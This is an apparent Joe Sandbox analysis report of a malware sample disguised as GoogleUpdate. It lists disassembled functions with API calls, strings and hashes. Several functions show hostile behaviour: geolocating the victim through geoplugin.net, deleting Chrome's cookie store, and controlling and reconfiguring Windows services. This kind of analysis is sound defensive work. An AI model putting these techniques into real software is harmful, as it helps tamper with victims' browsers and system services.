Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
Opcode Fuzzy Hash: 56e85467894a34748c48d0f1eb6f7913f46ef2942ef546941b50b0fa89a5bbba
Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E

Function 00453D2D Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fe7a57eeb80513b7b5fe64b1e34abf19149bc3f23fae782b0bf022f83ee5f09
Instruction ID: 106e2cecea33a690a52cc41c1271e31c3df1f85e8271d36c5dacef07d135bc52
Opcode Fuzzy Hash: 0fe7a57eeb80513b7b5fe64b1e34abf19149bc3f23fae782b0bf022f83ee5f09
Instruction Fuzzy Hash: 2C113232504214BBCB213F769C0596B7B7CDF857A7F11062BFC1583292DA38C9089269

Function 0041936B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
InternetCloseHandle.WININET(00000000), ref: 00419407
InternetCloseHandle.WININET(00000000), ref: 0041940A

Strings

http://geoplugin.net/json.gp, xrefs: 004193A2

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: 1de93e443a2e282a937f16c0ceb55f66d1fcd2319b03e24e709da9e0a2a31626
Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
Opcode Fuzzy Hash: 1de93e443a2e282a937f16c0ceb55f66d1fcd2319b03e24e709da9e0a2a31626
Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9

Function 0044E0DA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0044DE21: _free.LIBCMT ref: 0044DE4A

_free.LIBCMT ref: 0044E128

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044E133
_free.LIBCMT ref: 0044E13E
_free.LIBCMT ref: 0044E192
_free.LIBCMT ref: 0044E19D
_free.LIBCMT ref: 0044E1A8
_free.LIBCMT ref: 0044E1B3

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction ID: b65b67035ea7ffc6fe2c1778d32cb4f6cbb79ca162155871331ff7aa41bb66fd
Opcode Fuzzy Hash: d645742a9f031bfd4c53cfe37fe00a001808073c56fe889b6c8b285726f20831
Instruction Fuzzy Hash: 64111571940B08AAE520BFF2CC47FCBB7DC9F14708F50882EB29D6A552DA7DB6044654

Function 004380FA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004380F1,0043705E), ref: 00438108
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00438116
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043812F
SetLastError.KERNEL32(00000000,?,004380F1,0043705E), ref: 00438181

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
Instruction ID: 5a832d73688d02476ca7511e273f3515cfb573674d76dbd3fe9934521fa1a72b
Opcode Fuzzy Hash: 8fa3eba41d5dfcfa025b4cdbc1becdc984892f6557d94f52d480fd9577c81c63
Instruction Fuzzy Hash: F101283210C3326EAA102F767C85A1BAA94EB09779F31633FF214951E1FFA99C02550C

Function 0040A9E2 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040AA1E
GetLastError.KERNEL32 ref: 0040AA28

Strings

[Chrome Cookies not found], xrefs: 0040AA42
[Chrome Cookies found, cleared!], xrefs: 0040AA4E
\AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040A9E9
UserProfile, xrefs: 0040A9EE

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
API String ID: 2018770650-304995407
Opcode ID: 0a61cd6b6495849643311647e231b500c121e93944a07ca1c82b24e95f3714a3
Instruction ID: 1f34f6daae66b163f55af04f15e1d0b60933b3567ae099988c08ef58cbd90c9e
Opcode Fuzzy Hash: 0a61cd6b6495849643311647e231b500c121e93944a07ca1c82b24e95f3714a3
Instruction Fuzzy Hash: 0E01F731B4020467C6047A75DD278AE77249951304B50057FF402773D2FD798915CA9F

Function 00441548 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00441566

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00441578
_free.LIBCMT ref: 0044158B
_free.LIBCMT ref: 0044159C
_free.LIBCMT ref: 004415AD

Strings

pF, xrefs: 0044155C

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: pF
API String ID: 776569668-2973420481
Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E

Function 0043887C Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 00438A09
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A25
__allrem.LIBCMT ref: 00438A3C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A5A
__allrem.LIBCMT ref: 00438A71
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00438A8F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
Instruction ID: 1db505a437643d25cad1e1ab06004ebe691486694b679651004c0d70fbe8f9c1
Opcode Fuzzy Hash: a5bb698a37765ca5ad947defe33ca2ea1dc364bfd829a3e03f22b831f39bfe5b
Instruction Fuzzy Hash: CD815972A007069BE724BA29CC41B6BF3E8AF49328F14512FF511D6382EF78D900875D

Function 00410763 Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207

SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
GetNativeSystemInfo.KERNEL32(?,0040BE60,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 0041082E

Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000004,00000004,00000004,00000004,0041084C,?,00000000,00003000,00000004,00000000,?,?), ref: 00410718

GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00410875
HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0041087C
SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041098F

Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C,?,?,?,?,?), ref: 00410B4C
Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00410B53

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
String ID:
API String ID: 3950776272-0
Opcode ID: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
Opcode Fuzzy Hash: 97c9471a4feb21372bfec3f691305eac3cca21be586dff8f661e5b3b360a5f75
Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9

Function 00442E0B Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00442E37
__cftoe.LIBCMT ref: 00442E69

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: fe175afe76c71e94f48f18de2ff8b7888fd4a3d5f0ced9f470ddb34fbb41f910
Instruction ID: 4563a9c63fae0d6d7f7aa9a83d474a3ec136fb2d14012502de5dff0b8c27d610
Opcode Fuzzy Hash: fe175afe76c71e94f48f18de2ff8b7888fd4a3d5f0ced9f470ddb34fbb41f910
Instruction Fuzzy Hash: CB510C32500205ABFB209F598E45EAF77B8EF48334FE0421FF415D6282EB79D941966C

Function 00444A81 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00444B89
__freea.LIBCMT ref: 00444C33
__freea.LIBCMT ref: 00444C51

Part of subcall function 00433BED: _free.LIBCMT ref: 00433C03

Strings

am/pm, xrefs: 00444CB4
a/p, xrefs: 00444D18

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16_free
String ID: a/p$am/pm
API String ID: 2936374016-3206640213
Opcode ID: 86a94caed32ed52714acf924ceafe093e183b69c7042c505462fc06ec8b16e5d
Instruction ID: 5910b70c00eb86a61931efff1dda8232d7c1eee9eff2524394b85f82b3a3e216
Opcode Fuzzy Hash: 86a94caed32ed52714acf924ceafe093e183b69c7042c505462fc06ec8b16e5d
Instruction Fuzzy Hash: 05D1E171900206CAFB289F68C895BBBB7B1FF85300F29415BE905AB391D73D9D81CB59

Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
int.LIBCPMT ref: 0040F8D7

Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14

std::_Facet_Register.LIBCPMT ref: 0040F917
std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
__CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
__Init_thread_footer.LIBCMT ref: 0040F97F

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID:
API String ID: 3815856325-0
Opcode ID: 2a92d127d0bc41b4c1399fda7f39d698b8b2f00d2b835ce3580847fe0977fe40
Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
Opcode Fuzzy Hash: 2a92d127d0bc41b4c1399fda7f39d698b8b2f00d2b835ce3580847fe0977fe40
Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9

Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: de625251fdb0966dd0fe602b722cfa4efd58a0a8c2be3873cbf04c67ac3ad1aa
Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
Opcode Fuzzy Hash: de625251fdb0966dd0fe602b722cfa4efd58a0a8c2be3873cbf04c67ac3ad1aa
Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9

Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
_free.LIBCMT ref: 0044575C
_free.LIBCMT ref: 00445784
SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
_abort.LIBCMT ref: 004457A3

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D

Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: b7b69ea1573c73a9e6f41028e4c49f338adc93ff7086ca8506b44a1cd4c8c3a5
Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
Opcode Fuzzy Hash: b7b69ea1573c73a9e6f41028e4c49f338adc93ff7086ca8506b44a1cd4c8c3a5
Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9

Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4

Memory Dump Source

Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 9eb75cef1d4b67f2c10078b5b548f78349300c808b5f133cf6c8f4936e13ccb2
Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
Opcode Fuzzy Hash: 9eb75cef1d4b67f2c10078b5b548f78349300c808b5f133cf6c8f4936e13ccb2
Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9

Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B

Memory Dump Source

